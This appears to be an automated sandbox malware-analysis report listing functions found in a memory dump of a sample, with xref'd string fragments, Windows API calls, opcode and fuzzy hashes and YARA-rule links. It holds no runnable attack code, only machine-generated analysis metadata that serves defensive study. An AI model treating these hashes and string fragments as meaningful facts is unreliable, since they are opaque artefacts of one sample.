Opcode ID: 2ffd9d3d6f170c2214dbe814d0ce227cd3553b19ed2464a9f138930d33f2ff89
Instruction ID: 595445bb9589ae2c5f328c92f3b1edcb6a51503c02333d6edb7569174bf4645e
Opcode Fuzzy Hash: 2ffd9d3d6f170c2214dbe814d0ce227cd3553b19ed2464a9f138930d33f2ff89
Instruction Fuzzy Hash: E061477151D3419BC758CF25C48981FBBE2FBD8758F104A2DF59AA6260D3B4CA098B83

Uniqueness

Uniqueness Score: -1.00%

Function 00CB25C3, Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

}O, xrefs: 00CB262F
"a, xrefs: 00CB26FA

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: "a$}O
API String ID: 0-3171921561
Opcode ID: 5f0f5eb4b05d16de1cebac53edaf4031b4ce2a800789579872347960d480ff58
Instruction ID: e33d0a34d4ec727f474fb050459f1538bff44c1bf3ac0cd0a3b41b3d99ef146e
Opcode Fuzzy Hash: 5f0f5eb4b05d16de1cebac53edaf4031b4ce2a800789579872347960d480ff58
Instruction Fuzzy Hash: BC6132710083019FC358DF65C98985BBBF2FBC8758F505A0DF69A96260D7B5CA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 00CA748A, Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

5Q, xrefs: 00CA764B
9c, xrefs: 00CA749C

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 5Q$9c
API String ID: 0-959052616
Opcode ID: 6ab2a41fbf023ceff6316d937db61db7606df40c993748aa091592d68d00f0a2
Instruction ID: a959771d2c12a74ffd5201393e495ffe0c3cac4e0c41c98004c3df2ae2ad2e31
Opcode Fuzzy Hash: 6ab2a41fbf023ceff6316d937db61db7606df40c993748aa091592d68d00f0a2
Instruction Fuzzy Hash: 9051687150C3429FC358CF25D88A90BBBE1FBD8358F404E1DF59996260D3B9DA098F46

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB1B5, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

{_, xrefs: 00CAB235
r{P, xrefs: 00CAB23C

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: r{P${_
API String ID: 0-359611368
Opcode ID: b13479e0b2f08c1888c47a976b9863cdf1bf456e1398041e40de404634815ad5
Instruction ID: 16864b42549f5aa9d9a9f245f48037d13a98c6ac8ca9c5a877ae60c7058b4b9c
Opcode Fuzzy Hash: b13479e0b2f08c1888c47a976b9863cdf1bf456e1398041e40de404634815ad5
Instruction Fuzzy Hash: E9512171C0121E9BCF09CFA5D98A5EEBBB1FF15318F208199C422B6261D7B50A49DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C9BFB6, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

&xH, xrefs: 00C9C111
&xH, xrefs: 00C9C10B

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: &xH$&xH
API String ID: 0-1205046639
Opcode ID: 75776525c0191bd20906f6c7ed4d75df482bf2a07ae04cd259bb522680d291d8
Instruction ID: b815385b8f4d4fde4b3fe40b99016cba53d199c8b0a1fbde0c26fb4a087bb345
Opcode Fuzzy Hash: 75776525c0191bd20906f6c7ed4d75df482bf2a07ae04cd259bb522680d291d8
Instruction Fuzzy Hash: F05123B1E00209EFCF08CFA5D94A9EEFBB6EB48704F208059E514BB250D7B55A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C93345, Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

W, xrefs: 00C933CA
#3&, xrefs: 00C9336D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: #3&$W
API String ID: 0-2325648925
Opcode ID: a9a0c478908bafc83962f3b87b35b1cd0b84498ee3b2f9eefa55f1d80fe375d6
Instruction ID: 5a9307c7d42b0072a98705b8f71f2ac33008da37e8c6eb82b63cc183a3118307
Opcode Fuzzy Hash: a9a0c478908bafc83962f3b87b35b1cd0b84498ee3b2f9eefa55f1d80fe375d6
Instruction Fuzzy Hash: 60512F75D01309ABCF19DFA5CA8A5EEFBB1FF08714F208159D412B6260D3B46A54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CACCD4, Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

}f-, xrefs: 00CACD2C
5/|, xrefs: 00CACD23

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 5/|$}f-
API String ID: 0-2834218136
Opcode ID: 0940f7b8d7e58c5ad3842be0d7febd7ee8dd47da857396efdfefb5fb9a79c218
Instruction ID: b4c0b1e1314a683932a5025a3435c0205608606c35a036206af76ce100c93b59
Opcode Fuzzy Hash: 0940f7b8d7e58c5ad3842be0d7febd7ee8dd47da857396efdfefb5fb9a79c218
Instruction Fuzzy Hash: D631F37290010CBFDF05DFA5DC898EEBFB6FB48344F108159FA1466220D3B69A609B50

Uniqueness

Uniqueness Score: -1.00%

Function 00CB08D1, Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

S,, xrefs: 00CB0992
{, xrefs: 00CB095E

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: S,${
API String ID: 0-1759354436
Opcode ID: 69fb7e23cec5cec782e1fb09f73ec92955a2ab9f3a80d0b307b6d033f5d17d3a
Instruction ID: be0f3cdfff8d70b0554d6e84ab384710f218584517422f647261af0898a5410e
Opcode Fuzzy Hash: 69fb7e23cec5cec782e1fb09f73ec92955a2ab9f3a80d0b307b6d033f5d17d3a
Instruction Fuzzy Hash: 0F41F072D00219EBCF08DFA6D94A4EEBFB1FB48314F2480A9D511B6260C7B51A45DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C95923, Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

ms, xrefs: 00C959B5
`d, xrefs: 00C9597D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: `d$ms
API String ID: 0-1149396387
Opcode ID: deb45385cfc31a5128dbcd28618a47304140cc1eb3309295972ad1aee3cd9161
Instruction ID: b6eafa61d910ef0a70f905142c7955d3b0d63e6ca1e48780e49b11b664b194f5
Opcode Fuzzy Hash: deb45385cfc31a5128dbcd28618a47304140cc1eb3309295972ad1aee3cd9161
Instruction Fuzzy Hash: 0C3178326093519FD705CE18C98545BFBE0EF88618F050B6DF989A7211C774EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00C9220A, Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

TV1, xrefs: 00C92280
3c, xrefs: 00C922C5

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: TV1$3c
API String ID: 0-3390316800
Opcode ID: 37f292062facc737efc07354ba87213b831a0bcd9870a8fb590c766737d432f5
Instruction ID: 5b1c1d428b7217866628316605d4ed2f17b7ba1a818ce8a0fb93dac6ab6527f9
Opcode Fuzzy Hash: 37f292062facc737efc07354ba87213b831a0bcd9870a8fb590c766737d432f5
Instruction Fuzzy Hash: 62310276D0020CFBDF05CF95C84A8DEBBB6FB48354F408198F914A6210D3B69A20EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C92043, Relevance: 2.6, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

J4n, xrefs: 00C920F1
'q4, xrefs: 00C920AB

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 'q4$J4n
API String ID: 0-1087674265
Opcode ID: dd6d369b6af7bfcc8bd6536940347bc93706b84673d42be7764cf8c905203803
Instruction ID: a793d96a22edffd234ee9c63a995db8372560f33937f6d4a0747e564ee37f3fa
Opcode Fuzzy Hash: dd6d369b6af7bfcc8bd6536940347bc93706b84673d42be7764cf8c905203803
Instruction Fuzzy Hash: 9C21C2B5C0121DABDF45EFA1CA0A4EEBFB1FB14308F208099D52576261D7B50B18DF96

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AC6FE, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008), ref: 6F1AC92B

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 810597b3775ea3534bed4f98c73e66ea2cccf4bb08eb588b60c75fb3faa5d48e
Instruction ID: 597f3fffb9c4bdfa436098ff94a938401b2ef996a03894c22e089f9c59f32558
Opcode Fuzzy Hash: 810597b3775ea3534bed4f98c73e66ea2cccf4bb08eb588b60c75fb3faa5d48e
Instruction Fuzzy Hash: E0B17E39510608CFD705CF28C596B957BE0FF553A4F258699E8E9CF2A1C336E9A1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6F195916, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 6F19592F

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 45c7ed4291e77111298bb1421570e02154013db9cee04d945525a04d1a4b28ae
Instruction ID: 00d9faa2f27e46a3ecbdd40e6234fae901fd1eff6b38963e2231bec49189eb7b
Opcode Fuzzy Hash: 45c7ed4291e77111298bb1421570e02154013db9cee04d945525a04d1a4b28ae
Instruction Fuzzy Hash: 4B419AB1901606CFEB04CF9AC59579EBBF5FB493A9F10816BC415EB244D379A920CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B5DE7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

Part of subcall function 6F1AA294: _free.LIBCMT ref: 6F1AA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6F1B5E3B

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 3919b4b3a0139195eca1e5942f216b18b9aef16b1c599caa860ac62962f36a2f
Instruction ID: ac97f666b3ec75fca6538c2dab2fab38f2359bff57d5efc0711a78bc898c07c8
Opcode Fuzzy Hash: 3919b4b3a0139195eca1e5942f216b18b9aef16b1c599caa860ac62962f36a2f
Instruction Fuzzy Hash: 6121D476504306EBDB14CF29DD41BAAB3B8EF053A4F1001BEED05DA184EB76B964DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B5A6F, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

EnumSystemLocalesW.KERNEL32(6F1B5B97,00000001,00000000,?,6F1AB71F,?,6F1B61C4,00000000,?,?,?), ref: 6F1B5AE1

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: 307fad92a5ead36e8245e3065ff072639437289b866d6e4799be79396e107201
Instruction ID: fe8a606f99402aff7e5ba09fbf38bb6c9f37fd787580f4cc6e34cc199599bf8d
Opcode Fuzzy Hash: 307fad92a5ead36e8245e3065ff072639437289b866d6e4799be79396e107201
Instruction Fuzzy Hash: 35110C3B204705DFDB089F7DC8D067AB7A2FF84798B19442DD5469BA40E7717552CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B6017, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6F1B5DB5,00000000,00000000,?), ref: 6F1B6043

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort
String ID:
API String ID: 2070445861-0
Opcode ID: a7046ae3e70205c974483dcec26a9978b476ca2304bf0a5e1bf1b74d551665ca
Instruction ID: cfdfbefb7e1a122f2d62c644604b77ec4a0249d5d6cf0c66c0964d7bbf141dbb
Opcode Fuzzy Hash: a7046ae3e70205c974483dcec26a9978b476ca2304bf0a5e1bf1b74d551665ca
Instruction Fuzzy Hash: FBF0F932900119EBDB148A66C845BFA7778EF617D4F0144ADEC15A3180EA76FD71C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B597B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

Part of subcall function 6F1AA294: _free.LIBCMT ref: 6F1AA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6F1AB726,00000000,6F1AB846), ref: 6F1B59CF

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 5f6c9a1532383731575972ef63c6dba16d4b7cc4d488f68fbf3cb0c441438dd3
Instruction ID: fd6bc18f9bc699f66cee872df7b842ba24e8ed81b96c76b2a20fe8a751b2f1b3
Opcode Fuzzy Hash: 5f6c9a1532383731575972ef63c6dba16d4b7cc4d488f68fbf3cb0c441438dd3
Instruction Fuzzy Hash: D4F0F432A41205EBDB149F78DC449BA73A8EF467A4F0101BEE906DB280EB396D248790

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B5B0A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

EnumSystemLocalesW.KERNEL32(6F1B5DE7,00000001,FFFFFFFF,?,6F1AB71F,?,6F1B6188,6F1AB71F,?,?,?,?,?,6F1AB71F,?,?), ref: 6F1B5B56

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: e80cdb7827d9e393bfdeeb09dbe82a2dfb8f80d411056f5087393e6609c60a85
Instruction ID: e3d48eda01c05498653d2100ec8a11f07d28c84bf4fe3f4c7e0893758a18255f
Opcode Fuzzy Hash: e80cdb7827d9e393bfdeeb09dbe82a2dfb8f80d411056f5087393e6609c60a85
Instruction Fuzzy Hash: 67F0F6363047059FDB149F7DCC84A6ABBA6FF817ECF05442DF9058BA84E772A812D650

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ADD93, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6F1A7625: EnterCriticalSection.KERNEL32(-6F1D0F0D,?,6F1AE708,?,6F1CD460,0000000C), ref: 6F1A7634

EnumSystemLocalesW.KERNEL32(6F1ADD86,00000001,6F1CD420,0000000C), ref: 6F1ADDCB

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 1024ac12ac76fed8c835dd664f86aef3663db4df074db561c7ec89f36dc34411
Instruction ID: dd02c9b41b3c3599bf79389a5952cdfba950475b61eaf734cf234467a381262a
Opcode Fuzzy Hash: 1024ac12ac76fed8c835dd664f86aef3663db4df074db561c7ec89f36dc34411
Instruction Fuzzy Hash: 1BF04F36910704EFDB10DF68C845B5D3BF2BB053B5F014155F428DB2D0CB3699649B81

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AE2F8, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6F1AB7B9,?,20001004,?,00000002,?), ref: 6F1AE337

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 09eb16fcc224d666d7c3ba0895503413c11e779e9c16feecc48ce269d7e8ce66
Instruction ID: 7f7e42ea45b7da9622445e843ca485323f263fa6fdd7feb1f795889e92b5af0b
Opcode Fuzzy Hash: 09eb16fcc224d666d7c3ba0895503413c11e779e9c16feecc48ce269d7e8ce66
Instruction Fuzzy Hash: 88F08235500A18FBCF01AF21DC04DAE7FA6EF1ABA0F014159FC1556250CF32AE319B94

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B5A24, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

EnumSystemLocalesW.KERNEL32(6F1B597B,00000001,FFFFFFFF,?,?,6F1B61E6,6F1AB71F,?,?,?,?,?,6F1AB71F,?,?,?), ref: 6F1B5A5B

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: c15ad9eb4373090487e09b57e458858a95697c43d8dc42afdaefec65921afead
Instruction ID: 9e44a82f32defd4639c0750c281d07059224029eefe0b4928855d1255e76c954
Opcode Fuzzy Hash: c15ad9eb4373090487e09b57e458858a95697c43d8dc42afdaefec65921afead
Instruction Fuzzy Hash: 38F0EC36300205D7CB049F79C8946667F64EFC17A4F06405DEA058B555D776A553C790

Uniqueness

Uniqueness Score: -1.00%

Function 00C96B25, Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

%, xrefs: 00C96CA5

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: %
API String ID: 0-3264965323
Opcode ID: 5b80ed8458d5c4dfc608dd94cad42d575cd0bd262db5e9236542c87ca648ca1e
Instruction ID: ceee15f1bbdd6b8088314d6e1ab9e204c6596d887306b9a7b3307f4a1b6f6843
Opcode Fuzzy Hash: 5b80ed8458d5c4dfc608dd94cad42d575cd0bd262db5e9236542c87ca648ca1e
Instruction Fuzzy Hash: 16B157722083419FCB68CF65C49956BBBF0FB85708F504D1EF6A6862A0D7718A49DF43

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9DA1, Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Ci,, xrefs: 00CA9DCA

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: Ci,
API String ID: 0-192566918
Opcode ID: 5f915c74aebb82ae42e9263993067c442fc4f0db6a7726f02f37a687e14f641f
Instruction ID: a43143b11a39a97cc55db4e3f0bb3297768ebf1626ab6397c5f57157913c302a
Opcode Fuzzy Hash: 5f915c74aebb82ae42e9263993067c442fc4f0db6a7726f02f37a687e14f641f
Instruction Fuzzy Hash: 3CB121711083469FD768CF22C58961BBBE1FBC5718F10891DF29696261D7B28A09CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6F19DA2D, Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

0, xrefs: 6F19DB9D

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction ID: 67958c0f36cc58bd982496ca8fab03f8e0b2c343df45942996def3c42ceed843
Opcode Fuzzy Hash: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction Fuzzy Hash: 2751357164C7445BDB248AB886617EE37A7AB233C4F000A5BD9D2CB2D1C605F672C3E6

Uniqueness

Uniqueness Score: -1.00%

Function 00C92A46, Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

8r=, xrefs: 00C92C29

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: 8r=
API String ID: 0-2421701215
Opcode ID: 0f30bcfb947f2f0faf2319986e8639282aaaac4e0b0a34dd5b4dd28181594ba8
Instruction ID: 6268753a4f9d729d0f97fca81fd3e6020eb68be2fbd07f8f695bbd616d2990d8
Opcode Fuzzy Hash: 0f30bcfb947f2f0faf2319986e8639282aaaac4e0b0a34dd5b4dd28181594ba8
Instruction Fuzzy Hash: C6A131B21083819FC758CF65D88A84BFBF1FBC5358F005A1EF1959A260D7B5CA49CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00C91C76, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

p#[, xrefs: 00C91E12

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: p#[
API String ID: 0-3919597151
Opcode ID: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction ID: 4a50729f24c2c4627def47ed398dd99e8771083c41a871d33375630f3ef8d698
Opcode Fuzzy Hash: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction Fuzzy Hash: FD5187711093429FC798CE22C54A82BFBE1FBC4758F44491DF99692260D7B1CA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00CA406E, Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

[B, xrefs: 00CA4292

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: [B
API String ID: 0-3436147626
Opcode ID: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction ID: 9b28bfa02a1664e5db9dd19f5436cead0fb6afdc855e3dd3d26392a7d0d93b1c
Opcode Fuzzy Hash: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction Fuzzy Hash: E35154724083429FC758CF21C88991BBBE1FBD9758F408A1CF19AA6161D3B5CA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00CA78A5, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

ID, xrefs: 00CA78EF

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: ID
API String ID: 0-299066170
